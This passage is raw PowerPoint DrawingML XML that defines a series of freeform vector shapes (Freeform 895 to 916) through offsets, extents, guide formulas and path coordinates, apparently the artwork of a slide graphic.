                        <a:pt x="4051" y="1103"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1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895"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6159" y="140"/>
                  <a:ext cx="869" cy="318"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1798"/>
                    <a:gd name="T1" fmla="*/ 656 h 656"/>
                    <a:gd name="T2" fmla="*/ 1798 w 1798"/>
                    <a:gd name="T3" fmla="*/ 175 h 656"/>
                    <a:gd name="T4" fmla="*/ 1798 w 1798"/>
                    <a:gd name="T5" fmla="*/ 0 h 656"/>
                    <a:gd name="T6" fmla="*/ 0 w 1798"/>
                    <a:gd name="T7" fmla="*/ 484 h 656"/>
                    <a:gd name="T8" fmla="*/ 0 w 1798"/>
                    <a:gd name="T9" fmla="*/ 656 h 6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98" h="656">
                      <a:moveTo>
                        <a:pt x="0" y="656"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1798" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1798" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="484"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="65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0" name="Freeform 896"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4200" y="47"/>
                  <a:ext cx="1959" cy="617"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4051"/>
                    <a:gd name="T1" fmla="*/ 175 h 1276"/>
                    <a:gd name="T2" fmla="*/ 4051 w 4051"/>
                    <a:gd name="T3" fmla="*/ 1276 h 1276"/>
                    <a:gd name="T4" fmla="*/ 4051 w 4051"/>
                    <a:gd name="T5" fmla="*/ 1101 h 1276"/>
                    <a:gd name="T6" fmla="*/ 0 w 4051"/>
                    <a:gd name="T7" fmla="*/ 0 h 1276"/>
                    <a:gd name="T8" fmla="*/ 0 w 4051"/>
                    <a:gd name="T9" fmla="*/ 175 h 12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51" h="1276">
                      <a:moveTo>
                        <a:pt x="0" y="175"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4051" y="1276"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4051" y="1101"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1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1" name="Freeform 897"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6159" y="346"/>
                  <a:ext cx="869" cy="318"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1798"/>
                    <a:gd name="T1" fmla="*/ 657 h 657"/>
                    <a:gd name="T2" fmla="*/ 1798 w 1798"/>
                    <a:gd name="T3" fmla="*/ 175 h 657"/>
                    <a:gd name="T4" fmla="*/ 1798 w 1798"/>
                    <a:gd name="T5" fmla="*/ 0 h 657"/>
                    <a:gd name="T6" fmla="*/ 0 w 1798"/>
                    <a:gd name="T7" fmla="*/ 482 h 657"/>
                    <a:gd name="T8" fmla="*/ 0 w 1798"/>
                    <a:gd name="T9" fmla="*/ 657 h 6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98" h="657">
                      <a:moveTo>
                        <a:pt x="0" y="657"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1798" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1798" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="482"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="65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2" name="Freeform 898"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4200" y="457"/>
                  <a:ext cx="1959" cy="617"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4051"/>
                    <a:gd name="T1" fmla="*/ 175 h 1276"/>
                    <a:gd name="T2" fmla="*/ 4051 w 4051"/>
                    <a:gd name="T3" fmla="*/ 1276 h 1276"/>
                    <a:gd name="T4" fmla="*/ 4051 w 4051"/>
                    <a:gd name="T5" fmla="*/ 1101 h 1276"/>
                    <a:gd name="T6" fmla="*/ 0 w 4051"/>
                    <a:gd name="T7" fmla="*/ 0 h 1276"/>
                    <a:gd name="T8" fmla="*/ 0 w 4051"/>
                    <a:gd name="T9" fmla="*/ 175 h 12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51" h="1276">
                      <a:moveTo>
                        <a:pt x="0" y="175"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4051" y="1276"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4051" y="1101"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1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3" name="Freeform 899"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6159" y="756"/>
                  <a:ext cx="869" cy="318"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1798"/>
                    <a:gd name="T1" fmla="*/ 657 h 657"/>
                    <a:gd name="T2" fmla="*/ 1798 w 1798"/>
                    <a:gd name="T3" fmla="*/ 172 h 657"/>
                    <a:gd name="T4" fmla="*/ 1798 w 1798"/>
                    <a:gd name="T5" fmla="*/ 0 h 657"/>
                    <a:gd name="T6" fmla="*/ 0 w 1798"/>
                    <a:gd name="T7" fmla="*/ 482 h 657"/>
                    <a:gd name="T8" fmla="*/ 0 w 1798"/>
                    <a:gd name="T9" fmla="*/ 657 h 6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98" h="657">
                      <a:moveTo>
                        <a:pt x="0" y="657"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1798" y="172"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1798" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="482"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="65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4" name="Freeform 900"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4200" y="251"/>
                  <a:ext cx="1959" cy="617"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4051"/>
                    <a:gd name="T1" fmla="*/ 175 h 1275"/>
                    <a:gd name="T2" fmla="*/ 4051 w 4051"/>
                    <a:gd name="T3" fmla="*/ 1275 h 1275"/>
                    <a:gd name="T4" fmla="*/ 4051 w 4051"/>
                    <a:gd name="T5" fmla="*/ 1103 h 1275"/>
                    <a:gd name="T6" fmla="*/ 0 w 4051"/>
                    <a:gd name="T7" fmla="*/ 0 h 1275"/>
                    <a:gd name="T8" fmla="*/ 0 w 4051"/>
                    <a:gd name="T9" fmla="*/ 175 h 1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51" h="1275">
                      <a:moveTo>
                        <a:pt x="0" y="175"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4051" y="1275"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4051" y="1103"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1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901"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6159" y="550"/>
                  <a:ext cx="869" cy="318"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1798"/>
                    <a:gd name="T1" fmla="*/ 656 h 656"/>
                    <a:gd name="T2" fmla="*/ 1798 w 1798"/>
                    <a:gd name="T3" fmla="*/ 175 h 656"/>
                    <a:gd name="T4" fmla="*/ 1798 w 1798"/>
                    <a:gd name="T5" fmla="*/ 0 h 656"/>
                    <a:gd name="T6" fmla="*/ 0 w 1798"/>
                    <a:gd name="T7" fmla="*/ 484 h 656"/>
                    <a:gd name="T8" fmla="*/ 0 w 1798"/>
                    <a:gd name="T9" fmla="*/ 656 h 6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98" h="656">
                      <a:moveTo>
                        <a:pt x="0" y="656"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1798" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1798" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="484"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="65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902"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6159" y="267"/>
                  <a:ext cx="68" cy="876"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 142"/>
                    <a:gd name="T1" fmla="*/ 1812 h 1812"/>
                    <a:gd name="T2" fmla="*/ 142 w 142"/>
                    <a:gd name="T3" fmla="*/ 1774 h 1812"/>
                    <a:gd name="T4" fmla="*/ 142 w 142"/>
                    <a:gd name="T5" fmla="*/ 0 h 1812"/>
                    <a:gd name="T6" fmla="*/ 0 w 142"/>
                    <a:gd name="T7" fmla="*/ 38 h 1812"/>
                    <a:gd name="T8" fmla="*/ 0 w 142"/>
                    <a:gd name="T9" fmla="*/ 1812 h 18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2" h="1812">
                      <a:moveTo>
                        <a:pt x="0" y="1812"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="142" y="1774"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="181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903"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6960" y="52"/>
                  <a:ext cx="68" cy="877"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 140"/>
                    <a:gd name="T1" fmla="*/ 1812 h 1812"/>
                    <a:gd name="T2" fmla="*/ 140 w 140"/>
                    <a:gd name="T3" fmla="*/ 1774 h 1812"/>
                    <a:gd name="T4" fmla="*/ 140 w 140"/>
                    <a:gd name="T5" fmla="*/ 0 h 1812"/>
                    <a:gd name="T6" fmla="*/ 0 w 140"/>
                    <a:gd name="T7" fmla="*/ 38 h 1812"/>
                    <a:gd name="T8" fmla="*/ 0 w 140"/>
                    <a:gd name="T9" fmla="*/ 1812 h 18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0" h="1812">
                      <a:moveTo>
                        <a:pt x="0" y="1812"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="140" y="1774"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="181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904"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6092" y="267"/>
                  <a:ext cx="67" cy="876"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 137"/>
                    <a:gd name="T1" fmla="*/ 1774 h 1812"/>
                    <a:gd name="T2" fmla="*/ 137 w 137"/>
                    <a:gd name="T3" fmla="*/ 1812 h 1812"/>
                    <a:gd name="T4" fmla="*/ 137 w 137"/>
                    <a:gd name="T5" fmla="*/ 38 h 1812"/>
                    <a:gd name="T6" fmla="*/ 0 w 137"/>
                    <a:gd name="T7" fmla="*/ 0 h 1812"/>
                    <a:gd name="T8" fmla="*/ 0 w 137"/>
                    <a:gd name="T9" fmla="*/ 1774 h 18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" h="1812">
                      <a:moveTo>
                        <a:pt x="0" y="1774"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="137" y="1812"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="137" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="177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Freeform 905"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4200" y="-247"/>
                  <a:ext cx="65" cy="876"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 135"/>
                    <a:gd name="T1" fmla="*/ 1774 h 1812"/>
                    <a:gd name="T2" fmla="*/ 135 w 135"/>
                    <a:gd name="T3" fmla="*/ 1812 h 1812"/>
                    <a:gd name="T4" fmla="*/ 135 w 135"/>
                    <a:gd name="T5" fmla="*/ 38 h 1812"/>
                    <a:gd name="T6" fmla="*/ 0 w 135"/>
                    <a:gd name="T7" fmla="*/ 0 h 1812"/>
                    <a:gd name="T8" fmla="*/ 0 w 135"/>
                    <a:gd name="T9" fmla="*/ 1774 h 18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812">
                      <a:moveTo>
                        <a:pt x="0" y="1774"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="135" y="1812"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="135" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="177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0" name="Freeform 906"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6253" y="511"/>
                  <a:ext cx="432" cy="969"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 895 w 895"/>
                    <a:gd name="T1" fmla="*/ 241 h 2004"/>
                    <a:gd name="T2" fmla="*/ 0 w 895"/>
                    <a:gd name="T3" fmla="*/ 0 h 2004"/>
                    <a:gd name="T4" fmla="*/ 0 w 895"/>
                    <a:gd name="T5" fmla="*/ 1779 h 2004"/>
                    <a:gd name="T6" fmla="*/ 895 w 895"/>
                    <a:gd name="T7" fmla="*/ 2004 h 2004"/>
                    <a:gd name="T8" fmla="*/ 895 w 895"/>
                    <a:gd name="T9" fmla="*/ 241 h 20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95" h="2004">
                      <a:moveTo>
                        <a:pt x="895" y="241"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1779"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="895" y="2004"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="895" y="24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" name="Freeform 907"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6288" y="522"/>
                  <a:ext cx="374" cy="858"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 773"/>
                    <a:gd name="T1" fmla="*/ 0 h 1774"/>
                    <a:gd name="T2" fmla="*/ 0 w 773"/>
                    <a:gd name="T3" fmla="*/ 1717 h 1774"/>
                    <a:gd name="T4" fmla="*/ 225 w 773"/>
                    <a:gd name="T5" fmla="*/ 1774 h 1774"/>
                    <a:gd name="T6" fmla="*/ 773 w 773"/>
                    <a:gd name="T7" fmla="*/ 1462 h 1774"/>
                    <a:gd name="T8" fmla="*/ 773 w 773"/>
                    <a:gd name="T9" fmla="*/ 205 h 1774"/>
                    <a:gd name="T10" fmla="*/ 0 w 773"/>
                    <a:gd name="T11" fmla="*/ 0 h 17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73" h="1774">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1717"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="225" y="1774"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="773" y="1462"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="773" y="20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" name="Freeform 908"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6311" y="544"/>
                  <a:ext cx="331" cy="373"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 685"/>
                    <a:gd name="T1" fmla="*/ 0 h 772"/>
                    <a:gd name="T2" fmla="*/ 0 w 685"/>
                    <a:gd name="T3" fmla="*/ 588 h 772"/>
                    <a:gd name="T4" fmla="*/ 685 w 685"/>
                    <a:gd name="T5" fmla="*/ 772 h 772"/>
                    <a:gd name="T6" fmla="*/ 685 w 685"/>
                    <a:gd name="T7" fmla="*/ 181 h 772"/>
                    <a:gd name="T8" fmla="*/ 0 w 685"/>
                    <a:gd name="T9" fmla="*/ 0 h 7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85" h="772">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="685" y="772"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="685" y="18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909"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6684" y="930"/>
                  <a:ext cx="102" cy="292"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 210 w 210"/>
                    <a:gd name="T1" fmla="*/ 87 h 605"/>
                    <a:gd name="T2" fmla="*/ 2 w 210"/>
                    <a:gd name="T3" fmla="*/ 0 h 605"/>
                    <a:gd name="T4" fmla="*/ 0 w 210"/>
                    <a:gd name="T5" fmla="*/ 605 h 605"/>
                    <a:gd name="T6" fmla="*/ 210 w 210"/>
                    <a:gd name="T7" fmla="*/ 529 h 605"/>
                    <a:gd name="T8" fmla="*/ 210 w 210"/>
                    <a:gd name="T9" fmla="*/ 87 h 6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0" h="605">
                      <a:moveTo>
                        <a:pt x="210" y="87"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="2" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="605"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="529"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="8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910"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7220" y="755"/>
                  <a:ext cx="121" cy="396"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 250 w 250"/>
                    <a:gd name="T1" fmla="*/ 0 h 819"/>
                    <a:gd name="T2" fmla="*/ 2 w 250"/>
                    <a:gd name="T3" fmla="*/ 174 h 819"/>
                    <a:gd name="T4" fmla="*/ 0 w 250"/>
                    <a:gd name="T5" fmla="*/ 819 h 819"/>
                    <a:gd name="T6" fmla="*/ 250 w 250"/>
                    <a:gd name="T7" fmla="*/ 704 h 819"/>
                    <a:gd name="T8" fmla="*/ 250 w 250"/>
                    <a:gd name="T9" fmla="*/ 0 h 8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0" h="819">
                      <a:moveTo>
                        <a:pt x="250" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="2" y="174"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="819"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="250" y="704"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25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911"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6685" y="886"/>
                  <a:ext cx="166" cy="86"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 208 w 343"/>
                    <a:gd name="T1" fmla="*/ 177 h 177"/>
                    <a:gd name="T2" fmla="*/ 343 w 343"/>
                    <a:gd name="T3" fmla="*/ 0 h 177"/>
                    <a:gd name="T4" fmla="*/ 0 w 343"/>
                    <a:gd name="T5" fmla="*/ 90 h 177"/>
                    <a:gd name="T6" fmla="*/ 208 w 343"/>
                    <a:gd name="T7" fmla="*/ 177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43" h="177">
                      <a:moveTo>
                        <a:pt x="208" y="177"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="343" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="90"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="208" y="17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6" name="Freeform 912"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7151" y="755"/>
                  <a:ext cx="190" cy="86"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 352 w 392"/>
                    <a:gd name="T1" fmla="*/ 177 h 177"/>
                    <a:gd name="T2" fmla="*/ 392 w 392"/>
                    <a:gd name="T3" fmla="*/ 0 h 177"/>
                    <a:gd name="T4" fmla="*/ 0 w 392"/>
                    <a:gd name="T5" fmla="*/ 106 h 177"/>
                    <a:gd name="T6" fmla="*/ 352 w 392"/>
                    <a:gd name="T7" fmla="*/ 177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92" h="177">
                      <a:moveTo>
                        <a:pt x="352" y="177"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="392" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="17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913"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7645" y="1170"/>
                  <a:ext cx="236" cy="183"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 190 w 207"/>
                    <a:gd name="T1" fmla="*/ 0 h 160"/>
                    <a:gd name="T2" fmla="*/ 0 w 207"/>
                    <a:gd name="T3" fmla="*/ 51 h 160"/>
                    <a:gd name="T4" fmla="*/ 8 w 207"/>
                    <a:gd name="T5" fmla="*/ 160 h 160"/>
                    <a:gd name="T6" fmla="*/ 198 w 207"/>
                    <a:gd name="T7" fmla="*/ 109 h 160"/>
                    <a:gd name="T8" fmla="*/ 190 w 207"/>
                    <a:gd name="T9" fmla="*/ 0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7" h="160">
                      <a:moveTo>
                        <a:pt x="190" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="160"/>
                        <a:pt x="8" y="160"/>
                        <a:pt x="8" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="198" y="109"/>
                        <a:pt x="198" y="109"/>
                        <a:pt x="198" y="109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="78"/>
                        <a:pt x="195" y="4"/>
                        <a:pt x="19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914"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7514" y="1056"/>
                  <a:ext cx="348" cy="173"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 191 w 305"/>
                    <a:gd name="T1" fmla="*/ 0 h 151"/>
                    <a:gd name="T2" fmla="*/ 0 w 305"/>
                    <a:gd name="T3" fmla="*/ 51 h 151"/>
                    <a:gd name="T4" fmla="*/ 115 w 305"/>
                    <a:gd name="T5" fmla="*/ 151 h 151"/>
                    <a:gd name="T6" fmla="*/ 305 w 305"/>
                    <a:gd name="T7" fmla="*/ 100 h 151"/>
                    <a:gd name="T8" fmla="*/ 191 w 305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5" h="151">
                      <a:moveTo>
                        <a:pt x="191" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="115" y="151"/>
                        <a:pt x="115" y="151"/>
                        <a:pt x="115" y="151"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="305" y="100"/>
                        <a:pt x="305" y="100"/>
                        <a:pt x="305" y="100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="297" y="91"/>
                        <a:pt x="209" y="7"/>
                        <a:pt x="191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915"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7272" y="997"/>
                  <a:ext cx="460" cy="118"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 191 w 402"/>
                    <a:gd name="T1" fmla="*/ 0 h 103"/>
                    <a:gd name="T2" fmla="*/ 0 w 402"/>
                    <a:gd name="T3" fmla="*/ 51 h 103"/>
                    <a:gd name="T4" fmla="*/ 211 w 402"/>
                    <a:gd name="T5" fmla="*/ 103 h 103"/>
                    <a:gd name="T6" fmla="*/ 402 w 402"/>
                    <a:gd name="T7" fmla="*/ 52 h 103"/>
                    <a:gd name="T8" fmla="*/ 191 w 402"/>
                    <a:gd name="T9" fmla="*/ 0 h 1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2" h="103">
                      <a:moveTo>
                        <a:pt x="191" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="188" y="0"/>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="211" y="103"/>
                        <a:pt x="211" y="103"/>
                        <a:pt x="211" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="402" y="52"/>
                        <a:pt x="402" y="52"/>
                        <a:pt x="402" y="52"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="384" y="45"/>
                        <a:pt x="213" y="0"/>
                        <a:pt x="191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0" name="Freeform 916"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6786" y="796"/>
                  <a:ext cx="835" cy="674"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 731 w 731"/>
                    <a:gd name="T1" fmla="*/ 103 h 590"/>
                    <a:gd name="T2" fmla="*/ 352 w 731"/>
                    <a:gd name="T3" fmla="*/ 0 h 590"/>
                    <a:gd name="T4" fmla="*/ 352 w 731"/>
                    <a:gd name="T5" fmla="*/ 2 h 590"/>
                    <a:gd name="T6" fmla="*/ 325 w 731"/>
                    <a:gd name="T7" fmla="*/ 3 h 590"/>
                    <a:gd name="T8" fmla="*/ 57 w 731"/>
                    <a:gd name="T9" fmla="*/ 80 h 590"/>
                    <a:gd name="T10" fmla="*/ 56 w 731"/>
                    <a:gd name="T11" fmla="*/ 80 h 590"/>
                    <a:gd name="T12" fmla="*/ 0 w 731"/>
                    <a:gd name="T13" fmla="*/ 154 h 590"/>
                    <a:gd name="T14" fmla="*/ 0 w 731"/>
                    <a:gd name="T15" fmla="*/ 487 h 590"/>
                    <a:gd name="T16" fmla="*/ 0 w 731"/>
                    <a:gd name="T17" fmla="*/ 487 h 590"/>
